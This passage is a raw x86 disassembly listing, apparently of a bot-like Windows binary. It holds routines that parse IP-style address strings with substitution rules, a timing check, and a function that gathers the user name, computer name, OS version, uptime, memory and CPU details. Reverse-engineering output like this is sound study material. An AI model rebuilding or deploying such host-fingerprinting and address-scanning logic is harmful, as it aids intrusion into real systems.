mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407CCD
cmp [ebp+arg_8], 0
jz short loc_407CCB
cmp [ebp+var_8], 0
jz short loc_407CCB
loc_407C9C: ; CODE XREF: sub_407C2C:loc_407CC9�j
push 1
pop eax
test eax, eax
jz short loc_407CCB
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
and byte ptr [eax], 0
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_407CC7
cmp [ebp+var_8], 0
jnz short loc_407CC9
loc_407CC7: ; CODE XREF: sub_407C2C+93�j
jmp short loc_407CCB
; ---------------------------------------------------------------------------
loc_407CC9: ; CODE XREF: sub_407C2C+99�j
jmp short loc_407C9C
; ---------------------------------------------------------------------------
loc_407CCB: ; CODE XREF: sub_407C2C+68�j
; sub_407C2C+6E�j ...
jmp short locret_407CD2
; ---------------------------------------------------------------------------
loc_407CCD: ; CODE XREF: sub_407C2C+62�j
jmp loc_407C42
; ---------------------------------------------------------------------------
locret_407CD2: ; CODE XREF: sub_407C2C:loc_407CCB�j
leave
retn
sub_407C2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407CD4 proc near ; CODE XREF: sub_407D42+5F�p
; sub_407D42+79�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_407CE5
; ---------------------------------------------------------------------------
loc_407CDE: ; CODE XREF: sub_407CD4+68�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_407CE5: ; CODE XREF: sub_407CD4+8�j
cmp [ebp+var_4], 4
jge short loc_407D3E
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 2Eh
jnz short loc_407D0E
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D0E: ; CODE XREF: sub_407CD4+23�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407D2C
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
jmp short locret_407D40
; ---------------------------------------------------------------------------
loc_407D2C: ; CODE XREF: sub_407CD4+45�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
jmp short loc_407CDE
; ---------------------------------------------------------------------------
loc_407D3E: ; CODE XREF: sub_407CD4+15�j
xor eax, eax
locret_407D40: ; CODE XREF: sub_407CD4+38�j
; sub_407CD4+56�j
leave
retn
sub_407CD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D42 proc near ; CODE XREF: sub_407F3D+19�p
; sub_407F3D+3F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push 2Eh
push [ebp+arg_0]
call sub_4078E6
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 3
jle short loc_407D63
xor eax, eax
jmp locret_407E0A
; ---------------------------------------------------------------------------
loc_407D63: ; CODE XREF: sub_407D42+18�j
mov eax, [ebp+arg_10]
and byte ptr [eax], 0
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
mov eax, [ebp+arg_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_407DE9
cmp [ebp+var_8], 1
jz short loc_407DCF
cmp [ebp+var_8], 2
jz short loc_407DB5
cmp [ebp+var_8], 3
jz short loc_407D9B
jmp short loc_407E08
; ---------------------------------------------------------------------------
loc_407D9B: ; CODE XREF: sub_407D42+55�j
push [ebp+arg_0]
push [ebp+arg_4]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DB5
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DB5: ; CODE XREF: sub_407D42+4F�j
; sub_407D42+6D�j
push [ebp+arg_0]
push [ebp+arg_8]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DCF
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DCF: ; CODE XREF: sub_407D42+49�j
; sub_407D42+87�j
push [ebp+arg_0]
push [ebp+arg_C]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407DE9
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407DE9: ; CODE XREF: sub_407D42+43�j
; sub_407D42+A1�j
push [ebp+arg_0]
push [ebp+arg_10]
call sub_407CD4
pop ecx
pop ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jnz short loc_407E03
xor eax, eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E03: ; CODE XREF: sub_407D42+BB�j
push 1
pop eax
jmp short locret_407E0A
; ---------------------------------------------------------------------------
loc_407E08: ; CODE XREF: sub_407D42+57�j
xor eax, eax
locret_407E0A: ; CODE XREF: sub_407D42+1C�j
; sub_407D42+71�j ...
leave
retn
sub_407D42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E0C proc near ; CODE XREF: sub_407F3D+A3�p
; sub_407F3D+C1�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 72h
jnz short loc_407E4A
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_407E4A
push 0Ah
push [ebp+arg_C]
push 0FFh
push 0
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
mov eax, [ebp+arg_10]
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407E4A: ; CODE XREF: sub_407E0C+D�j
; sub_407E0C+18�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 73h
jz short loc_407E64
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz loc_407EF9
loc_407E64: ; CODE XREF: sub_407E0C+47�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz loc_407EF9
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407EB3
cmp [ebp+arg_10], 0
jz short loc_407EB3
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
movzx eax, al
inc eax
mov [ebp+var_4], al
push 0Ah
push [ebp+arg_C]
movzx eax, [ebp+var_4]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
movzx eax, [ebp+var_4]
neg eax
sbb eax, eax
inc eax
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407EB3: ; CODE XREF: sub_407E0C+6F�j
; sub_407E0C+75�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407ECC
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407ECC: ; CODE XREF: sub_407E0C+AF�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz short loc_407EE8
push offset dword_418F50
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407EE8: ; CODE XREF: sub_407E0C+C9�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_407EF5: ; CODE XREF: sub_407E0C+BE�j
; sub_407E0C+DA�j
xor eax, eax
jmp short locret_407F3B
; ---------------------------------------------------------------------------
loc_407EF9: ; CODE XREF: sub_407E0C+52�j
; sub_407E0C+61�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F12
push [ebp+arg_4]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F12: ; CODE XREF: sub_407E0C+F5�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F2B
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F2B: ; CODE XREF: sub_407E0C+10E�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_407F38: ; CODE XREF: sub_407E0C+104�j
; sub_407E0C+11D�j
mov eax, [ebp+arg_10]
locret_407F3B: ; CODE XREF: sub_407E0C+39�j
; sub_407E0C+A2�j ...
leave
retn
sub_407E0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F3D proc near ; CODE XREF: sub_41349C+192�p
; sub_41349C+3DA�p
var_44 = byte ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 44h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F69
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F69: ; CODE XREF: sub_407F3D+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F8F
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F8F: ; CODE XREF: sub_407F3D+49�j
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push offset dword_41EF18
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407FB7
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FB7: ; CODE XREF: sub_407F3D+71�j
movsx eax, [ebp+var_14]
test eax, eax
jnz short loc_407FC6
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FC6: ; CODE XREF: sub_407F3D+80�j
mov [ebp+var_18], 1
push [ebp+var_18]
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_44]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_20]
push eax
push offset dword_418F54
push [ebp+arg_8]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_408068: ; CODE XREF: sub_407F3D+27�j
; sub_407F3D+4D�j ...
leave
retn
sub_407F3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40806A proc near ; CODE XREF: sub_41349C+12A�p
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_408096
xor eax, eax
jmp locret_40813A
; ---------------------------------------------------------------------------
loc_408096: ; CODE XREF: sub_40806A+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push offset dword_41EF18
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_4080BB
xor eax, eax
jmp short locret_40813A
; ---------------------------------------------------------------------------
loc_4080BB: ; CODE XREF: sub_40806A+4B�j
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_4080D2
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_4080D2: ; CODE XREF: sub_40806A+57�j
movsx eax, [ebp+var_1C]
test eax, eax
jnz short loc_4080E9
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_4080E9: ; CODE XREF: sub_40806A+6E�j
movsx eax, [ebp+var_20]
test eax, eax
jnz short loc_408100
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_20]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408100: ; CODE XREF: sub_40806A+85�j
movsx eax, [ebp+var_4]
test eax, eax
jnz short loc_408117
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408117: ; CODE XREF: sub_40806A+9C�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push offset dword_418F54
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_40813A: ; CODE XREF: sub_40806A+27�j
; sub_40806A+4F�j
leave
retn
sub_40806A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40813C proc near ; CODE XREF: sub_407928+54�p
; sub_407928+9D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jz short loc_408150
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_408150: ; CODE XREF: sub_40813C+A�j
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_8], eax
jmp short loc_408161
; ---------------------------------------------------------------------------
loc_40815A: ; CODE XREF: sub_40813C:loc_4081A0�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408161: ; CODE XREF: sub_40813C+1C�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081A2
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_408171: ; CODE XREF: sub_40813C+56�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_408194
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_408194
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_408171
; ---------------------------------------------------------------------------
loc_408194: ; CODE XREF: sub_40813C+3D�j
; sub_40813C+4D�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081A0
jmp short loc_4081A2
; ---------------------------------------------------------------------------
loc_4081A0: ; CODE XREF: sub_40813C+60�j
jmp short loc_40815A
; ---------------------------------------------------------------------------
loc_4081A2: ; CODE XREF: sub_40813C+2D�j
; sub_40813C+62�j
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_4081AE: ; CODE XREF: sub_40813C:loc_4081F5�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081F7
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_4081D7
mov eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_4081F7
; ---------------------------------------------------------------------------
loc_4081D7: ; CODE XREF: sub_40813C+8A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081F5
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_4081F5: ; CODE XREF: sub_40813C+AA�j
jmp short loc_4081AE
; ---------------------------------------------------------------------------
loc_4081F7: ; CODE XREF: sub_40813C+7A�j
; sub_40813C+99�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
mov [eax], ecx
mov eax, [ebp+var_8]
sub eax, [ebp+var_C]
neg eax
sbb eax, eax
and eax, [ebp+var_8]
leave
retn
sub_40813C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40820E proc near ; CODE XREF: sub_40821B:loc_408221�p
; sub_40821B+1C�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
rdtsc
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40820E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40821B proc near ; CODE XREF: sub_4083AD+3A4�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
loc_408221: ; CODE XREF: sub_40821B+4A�j
; sub_40821B+55�j
call sub_40820E
mov [ebp+var_20], eax
mov [ebp+var_1C], edx
push 3E8h
call dword_41709C ; Sleep
call sub_40820E
sub eax, [ebp+var_20]
sbb edx, [ebp+var_1C]
push 0
push 186A0h
push edx
push eax
call sub_416C90
push 0
push 0Ah
push edx
push eax
call sub_416C90
mov [ebp+var_8], eax
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
ja short loc_408221
jb short loc_408272
cmp [ebp+var_8], 0F4240h
ja short loc_408221
loc_408272: ; CODE XREF: sub_40821B+4C�j
push 0
push 64h
push [ebp+var_4]
push [ebp+var_8]
call sub_416C10
mov [ebp+var_18], eax
mov [ebp+var_14], edx
mov [ebp+var_10], 64h
and [ebp+var_C], 0
cmp [ebp+var_14], 0
ja short loc_4082AB
jb short loc_4082A0
cmp [ebp+var_18], 50h
jnb short loc_4082AB
loc_4082A0: ; CODE XREF: sub_40821B+7D�j
mov [ebp+var_10], 4Bh
and [ebp+var_C], 0
loc_4082AB: ; CODE XREF: sub_40821B+7B�j
; sub_40821B+83�j
cmp [ebp+var_14], 0
ja short loc_4082C4
jb short loc_4082B9
cmp [ebp+var_18], 47h
jnb short loc_4082C4
loc_4082B9: ; CODE XREF: sub_40821B+96�j
mov [ebp+var_10], 42h
and [ebp+var_C], 0
loc_4082C4: ; CODE XREF: sub_40821B+94�j
; sub_40821B+9C�j
cmp [ebp+var_14], 0
ja short loc_4082DD
jb short loc_4082D2
cmp [ebp+var_18], 37h
jnb short loc_4082DD
loc_4082D2: ; CODE XREF: sub_40821B+AF�j
mov [ebp+var_10], 32h
and [ebp+var_C], 0
loc_4082DD: ; CODE XREF: sub_40821B+AD�j
; sub_40821B+B5�j
cmp [ebp+var_14], 0
ja short loc_4082F6
jb short loc_4082EB
cmp [ebp+var_18], 26h
jnb short loc_4082F6
loc_4082EB: ; CODE XREF: sub_40821B+C8�j
mov [ebp+var_10], 21h
and [ebp+var_C], 0
loc_4082F6: ; CODE XREF: sub_40821B+C6�j
; sub_40821B+CE�j
cmp [ebp+var_14], 0
ja short loc_40830F
jb short loc_408304
cmp [ebp+var_18], 1Eh
jnb short loc_40830F
loc_408304: ; CODE XREF: sub_40821B+E1�j
mov [ebp+var_10], 19h
and [ebp+var_C], 0
loc_40830F: ; CODE XREF: sub_40821B+DF�j
; sub_40821B+E7�j
cmp [ebp+var_14], 0
ja short loc_408325
jb short loc_40831D
cmp [ebp+var_18], 0Ah
jnb short loc_408325
loc_40831D: ; CODE XREF: sub_40821B+FA�j
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408325: ; CODE XREF: sub_40821B+F8�j
; sub_40821B+100�j
mov eax, [ebp+var_8]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_4]
sbb ecx, [ebp+var_14]
add eax, [ebp+var_10]
adc ecx, [ebp+var_C]
mov [ebp+var_8], eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_8]
leave
retn
sub_40821B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408342 proc near ; CODE XREF: sub_40D043+156�p
; sub_40D871+30C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1Fh
push [ebp+arg_0]
push 7
push 400h
call dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
cmp [ebp+var_4], 0
jz short loc_408381
push offset off_419100
push [ebp+arg_0]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_4083A8
loc_408381: ; CODE XREF: sub_408342+2A�j
push 1Fh
push [ebp+arg_0]
push 7
push 800h
call dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
mov eax, [ebp+var_4]
jmp short locret_4083AB
; ---------------------------------------------------------------------------
loc_4083A8: ; CODE XREF: sub_408342+3D�j
push 1
pop eax
locret_4083AB: ; CODE XREF: sub_408342+64�j
leave
retn
sub_408342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083AD proc near ; DATA XREF: sub_4087C4+35�o
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_73C = dword ptr -73Ch
var_738 = dword ptr -738h
var_734 = byte ptr -734h
var_72C = dword ptr -72Ch
var_728 = dword ptr -728h
var_714 = dword ptr -714h
var_710 = dword ptr -710h
var_70C = dword ptr -70Ch
var_708 = byte ptr -708h
var_6F0 = dword ptr -6F0h
var_6EC = dword ptr -6ECh
var_6E8 = dword ptr -6E8h
var_6E4 = dword ptr -6E4h
var_6E0 = byte ptr -6E0h
var_6D0 = dword ptr -6D0h
var_6CC = dword ptr -6CCh
var_6C8 = byte ptr -6C8h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = dword ptr -518h
var_514 = dword ptr -514h
var_510 = dword ptr -510h
var_50C = byte ptr -50Ch
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_409 = byte ptr -409h
var_408 = byte ptr -408h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 750h
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_6CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_734]
push eax
call dword_4170C4 ; GlobalMemoryStatus
mov eax, [ebp+var_72C]
add eax, 100000h
shr eax, 14h
mov [ebp+var_6F0], eax
mov eax, [ebp+var_728]
add eax, 100000h
shr eax, 14h
mov [ebp+var_738], eax
call sub_4092A4
mov [ebp+var_714], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_6E8], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_714]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_6E4], eax
mov [ebp+var_8], 15h
mov [ebp+var_6D0], 10h
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_708]
push eax
call dword_417018 ; GetUserNameA
lea eax, [ebp+var_6D0]
push eax
lea eax, [ebp+var_6E0]
push eax
call dword_417078 ; GetComputerNameA
mov [ebp+var_520], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_51C]
rep stosd
lea eax, [ebp+var_520]
push eax
call dword_417030 ; GetVersionExA
mov [ebp+var_48C], offset a? ; "?"
mov [ebp+var_710], offset aNoSp ; "no SP"
cmp [ebp+var_51C], 4
jnz short loc_408522
cmp [ebp+var_518], 0
jnz short loc_408522
cmp [ebp+var_510], 1
jnz short loc_40850A
mov [ebp+var_48C], offset a95 ; "95"
loc_40850A: ; CODE XREF: sub_4083AD+151�j
cmp [ebp+var_510], 2
jnz short loc_40851D
mov [ebp+var_48C], offset aNt ; "NT"
loc_40851D: ; CODE XREF: sub_4083AD+164�j
jmp loc_4085B6
; ---------------------------------------------------------------------------
loc_408522: ; CODE XREF: sub_4083AD+13F�j
; sub_4083AD+148�j
cmp [ebp+var_51C], 4
jnz short loc_408540
cmp [ebp+var_518], 0Ah
jnz short loc_408540
mov [ebp+var_48C], offset a98 ; "98"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_408540: ; CODE XREF: sub_4083AD+17C�j
; sub_4083AD+185�j
cmp [ebp+var_51C], 4
jnz short loc_40855E
cmp [ebp+var_518], 5Ah
jnz short loc_40855E
mov [ebp+var_48C], offset aMe ; "ME"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40855E: ; CODE XREF: sub_4083AD+19A�j
; sub_4083AD+1A3�j
cmp [ebp+var_51C], 5
jnz short loc_40857C
cmp [ebp+var_518], 0
jnz short loc_40857C
mov [ebp+var_48C], offset a2000 ; "2000"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40857C: ; CODE XREF: sub_4083AD+1B8�j
; sub_4083AD+1C1�j
cmp [ebp+var_51C], 5
jnz short loc_40859A
cmp [ebp+var_518], 1
jnz short loc_40859A
mov [ebp+var_48C], offset aXp ; "XP"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40859A: ; CODE XREF: sub_4083AD+1D6�j
; sub_4083AD+1DF�j
cmp [ebp+var_51C], 5
jnz short loc_4085B6
cmp [ebp+var_518], 2
jnz short loc_4085B6
mov [ebp+var_48C], offset a2003 ; "2003"
loc_4085B6: ; CODE XREF: sub_4083AD:loc_40851D�j
; sub_4083AD+191�j ...
cmp [ebp+var_510], 2
jnz short loc_4085D6
movsx eax, [ebp+var_50C]
test eax, eax
jz short loc_4085D6
lea eax, [ebp+var_50C]
mov [ebp+var_710], eax
loc_4085D6: ; CODE XREF: sub_4083AD+210�j
; sub_4083AD+21B�j
call sub_40435B
test eax, eax
jz short loc_4085EB
mov [ebp+var_744], offset aYes ; "Yes"
jmp short loc_4085F5
; ---------------------------------------------------------------------------
loc_4085EB: ; CODE XREF: sub_4083AD+230�j
mov [ebp+var_744], offset aNo ; "No"
loc_4085F5: ; CODE XREF: sub_4083AD+23C�j
mov eax, [ebp+var_744]
mov [ebp+var_4], eax
and [ebp+var_47C], 0
and [ebp+var_409], 0
xor eax, eax
cpuid
mov [ebp+var_488], ebx
